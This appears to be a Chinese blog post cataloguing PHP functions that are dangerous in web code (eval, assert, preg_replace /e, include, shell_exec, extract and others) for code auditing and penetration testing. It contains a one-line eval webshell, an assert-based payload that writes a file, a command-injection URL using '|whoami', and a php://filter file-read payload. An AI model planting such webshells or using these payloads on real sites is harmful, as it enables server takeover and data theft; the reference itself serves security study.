常见危险函数及特殊函数

1 php代码执行函数

1.2 eval
mixed eval(string $code)
把字符串$code作为PHP代码执行。
很多常见的webshell都是用eval来执行具体操作的。
<?php @eval($_POST['v']);?>


bool assert(mixed $assertion [, string $description])  //调试函数
检查一个断言是否为FALSE,(把字符串$assertion作为PHP代码执行)
因为大多数杀软把eval列入了黑名单了,所以用assert来替代eval来执行具体操作的。
<?php $_GET[a]($_GET[b]);?>
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PDwaHAgQGV2YWw%29%29};

@eval('echo "test";');
echo "test";
@eval('echo "test";');
echo "\r\n"
echo "test";

结果:
test
test
1.2 assert
assert('system("whoami");');

因为大多数杀毒软件把eval 列入黑名单,所以用assert来代替eval来执行具体操作

1.3 preg_replace
mixed preg_replace(mixed $pattern, mixed $replacement, mixed $subject [, int $limit= -1 [, int &$count]])

/e修正符使preg_replace()将replacement参数当作PHP代码

 
preg_replace("/test/e","phpinfo();","jutst test");
如果我们提交?h=phpinfo(), phpinfo()将会被执行
1.4 匿名函数
php特性,变量可以当作函数名执行。

string create_function(sting $args, sting $code)
创建一个匿名函数,并返回独一无二的函数名。
$newfunc = create_function('$v', 'return system(&v);');
$newfunc('whoami');相当于system('whoami');


$cfunc = create_function('$v', 'return system($v);');
$cfunc('whoami');

结果:
shadowtest\shadowtest


 另外一种形式的匿名函数
$sfunc = 'sys'.'tem';
$sfunc('whoami');

结果:
shadowtest\shadowtest
1.5 回调函数
  • mixed call_user_func(callabel $callback [,mixed $parameter [, mixed $...]])
    第一个参数callback是被调用的回调函数,其余参数是回调函数的参数
function test($var){
  echo "callable test $var";
}
call_user_func('test','shadowtest');
call_user_func('system','whoami)

结果:
callable test shadowtest
shadowtest\shadowtest
  • mixed call_user_func_array(callable $callback, array $param_arr)
    第一个参数作为回调函数(callback)调用,把参数数组(param_arr)作为回调函数的参数传入

2 包含函数

  • require
  • include
  • require_once
  • include_once

包含函数一共有四个,主要作用为包含并运行指定文件(运行php标签里的php代码)

include $file;
include($_GET['file']);

在变量$file可控的情况下,我们可以包含任意文件,从而达到getshell的目的。
另外,在不同的配置环境下,可以包含不同的文件。
因此又分为远程文件包含和本地文件包含。
包含函数也能够读取任意文件内容,这就需要用到【支持的协议和封装的协议】和【过滤器】。例如,利用php流读取任意文件

include($_GET['file']);
?file=php://filter/convert.base64-encode/resource=index.php

3 命令执行函数

执行函数包括但不限于下述几个。

3.1 exec()

执行一个外部程序

3.2 passthru()

执行外部程序并且显示原始输出

3.3 proc_open()

执行一个命令,并且打开用来输入/输出的文件指针

3.4 shell_exec()
echo shell_exec('ping 127.0.0.1');
echo shell_exec('ping' . $_GET["v"]);
#访问http://www.shadowflow.com/test_fun.php?v=127.0.0.1|whoami执行whoami系统命令

通过shell环境执行命令,并且将完整的输出以字符串的方式返回。

3.5 system()

执行外部程序,并且显示输出

3.6 popen()

通过popen()的参数传递一条命令,并对popen()所打开的文件进行执行

4 文件操作函数

copy------------------------拷贝文件
file_get_contents---------将整个文件读入一个字符串
file_put_contents---------将一个字符串写入文件
file----------------------------把整个文件读入一个数组中
fopen------------------------打开文件或者url
move_uploaded_file----将上传的文件移动到新位置
readfile----------------------输出文件
rename---------------------重命名一个文件或目录
rmdir------------------------删除目录
unlink & delete-----------删除文件

任意文件读取,写入, 删除往往是上面几个函数受到了控制(当然还有其他函数)

读取:可以读取配置等文件,拿到key
写入:可以写入shell代码相关的内容
删除:可以删除.lock文件而可以重新安装覆盖

5 特殊函数

5.1 信息泄露

phpinfo()

5.2 软连接-读取文件内容

symlink()
一般是在linux服务器上使用的,为一个目标建立一个连接,在读取这个链接所连接的文件的内容,并返回内容

readlin()

5.3 环境变量

string getenv (string $varname)
获取一个环境变量的值

bool putenv(string $setting)
添加setting 到服务器环境变量。环境变量仅存活于当前请求期间。在请求结束时环境会恢复到初始状态

5.5 加载扩展:

bool dl (string $library)
载入指定参数library的PHP扩展

5.6 配置相关
  • string ini_get(string $varname)
    成功时返回配置选项的值
  • string ini_set(string $varname,string $newvalue)
    string ini_alter(string $varname, string $newvalue)
    设置指定配置选项的值。这个选项会 在脚本运行时保持新的值,并在脚本结束时恢复。
  • void ini_restore(string $varname)
    恢复指定的配置选项到它的原始值
5.7 数字判断

bool is_numeric(mixed $var)
仅用is_numeric判断而不是用intval转换就有可能插入十六进制的字符串到数据库,进而可能导致sql二次注入
十六进制绕过

5.8 数组相关

bool in_array (mixed $needle, array $haystack [,bool $strict=FALSE])
在haystack中搜索needle,如果没有设置strict则使用宽松的比较。
该函数有一个特性,比较之前会进行自动类型转换

$v = 1;
var_dump(in_array($v,array("1",2,3))); //1 == "1"
echo "\r\n<br />";
var_dump(in_array($v,array("1",2,3),true)); //1 ==="1"
echo "\r\n<br />";
$v = '1abc';
var_dump(in_array($v,array(1,2,3)));//'1abc' == 1
echo "\r\n<br />";
var_dump(in_array($v,array("2",2,3)));

结果:
true
false
true
false
5.9 变量覆盖相关
 void parse_str(string  &str [, array &$star])

如果str是URL传递入的查询字符串(query string ),则将它解析为变量并设置到当前作用域

int extract(array & $var_array [,int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL

本函数用来将变量从数组中导入到当前的符号表中。检查每个键名看是否可以作为一个合法的变量名,同事也检查和符号表中已有的变量名的冲突

bool mb_parse_str (string $encoded_string [,array &$result])

解析GET/POST/COOKIE数据并设置全局变量。由于PHP不提供原始POST/COOKIE数据,目前它仅能够用于GET数据。它解析了URL编码过的数据,检测其编码,并转换编码为内部编码,然后设置其值为array的result或者全局变量

bool import_request_variables(string $type [,string $prefix])

将GET/POST/Cookie变量导入到全局作用域中,如果你禁用了register_globals, 但又想用到一些全局变量,那么此函数就很有用

5.10 列目录

glob()函数依照libc glob()函数使用规则寻找所有与pattern匹配的文件路径,类似于一般shells所用的规则一样。不进行缩写扩展或参数代替。

echo "<pre>"
print_r(glob("*.php"));
5.11 无参数获取信息
array get_defined_vars(void)

返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量,服务器变量和用户定义的变量。

array get_defined_constants([bool $categorase=false])

返回当前已定义的常量名和值。这包含define()函数创建的,也包含了所有扩展所创建的

array get_defined_functions(void)

返回一个包含所有已定义函数列表的多维数组

array get_include_files(void)

返回所有被include,include_once,require和require_once的文件名

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,921评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,635评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,393评论 0 338
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,836评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,833评论 5 368
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,685评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,043评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,694评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 42,671评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,670评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,779评论 1 332
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,424评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,027评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,984评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,214评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,108评论 2 351
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,517评论 2 343

推荐阅读更多精彩内容

  • PHP代码执行函数 eval & assert & preg_replace eval 函数 php官方手册:ht...
    xaviershun阅读 5,066评论 1 12
  • Lua 5.1 参考手册 by Roberto Ierusalimschy, Luiz Henrique de F...
    苏黎九歌阅读 13,733评论 0 38
  • 总结了一些开发中常用的函数: usleep() //函数延迟代码执行若干微秒。 unpack() //函数从二进制...
    ADL2022阅读 454评论 0 3
  • 关键词:主格、宾格、现在直陈式、动词变位 德语中的“格” 在英语中,“he”和“I”都可以用作句子的主语(发出动作...
    medisol阅读 5,373评论 0 6
  • 人物周刊的推文看了一篇又一篇,我喜欢它们,在人物新闻稿子里,我看见了的不只是那些振聋发聩的大人物名人名流,我看见的...
    好像走了很远阅读 134评论 0 0